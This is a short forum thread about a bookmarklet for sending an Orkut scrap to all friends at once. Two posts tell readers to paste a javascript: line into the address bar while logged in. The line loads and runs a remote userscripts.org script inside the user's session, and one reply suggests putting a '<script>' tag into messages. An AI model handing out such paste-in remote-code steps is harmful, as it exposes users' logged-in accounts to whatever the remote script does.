Scrap to all friends in one click in Orkut

Status
Not open for further replies.

ajaybc

Youngling
Hi,

To send scrap to all your friends at once enter the following code into ur address bar after logging in to orkut.
The advantage this code has over others is that it doesn't place that annoying "To send scrap to all your friends ..blah..blah..blah..."at the bottom of your scraps.This is a small program in JAVA and I edited the code of the original application for this.The original creator please pardon me.
The code is as follows:

javascript:d=document;c=d.createElement('script'); d.body.appendChild(c);c.src='*userscripts.org/scripts/source/5ed0e6c358eb920a6e1a1159c60b9dfa20a95eb7/17886.user.js';void(0)

Last edited:

hullap

Cyborg Agent
THNKS MAN RELLY NEEDED THAT.
amny times that i scrap "ur the best" or sumthin. ppl say why did u scrap everyone

VINSTAR

Not fresh
just write
<script>
in the end of the msg
no advertisements will com
as this
*img529.imageshack.us/img529/3254/trickaf4.png

ashfame

Padawan
Hi,

To send scrap to all your friends at once enter the following code into ur address bar after logging in to orkut.
The advantage this code has over others is that it doesn't place that annoying "To send scrap to all your friends ..blah..blah..blah..."at the bottom of your scraps.This is a small program in JAVA and I edited the code of the original application for this.The original creator please pardon me.
The code is as follows:

javascript:d=document;c=d.createElement('script'); d.body.appendChild(c);c.src='*userscripts.org/scripts/source/5ed0e6c358eb920a6e1a1159c60b9dfa20a95eb7/17886.user.js';void(0)

Its not working dude. Can you see what's wrong?
just write
<script>
in the end of the msg
no advertisements will com
as this
*img529.imageshack.us/img529/3254/trickaf4.png
Can you please explain what you intend to tell?

shimari

Right off the assembly line
Hello, the script opens a window and even seems to be sending the scraps I try to, but no scraps are actually sent. Any ideas?
Btw: I'm using the script provided by ashfame.

Status
Not open for further replies.
Top Bottom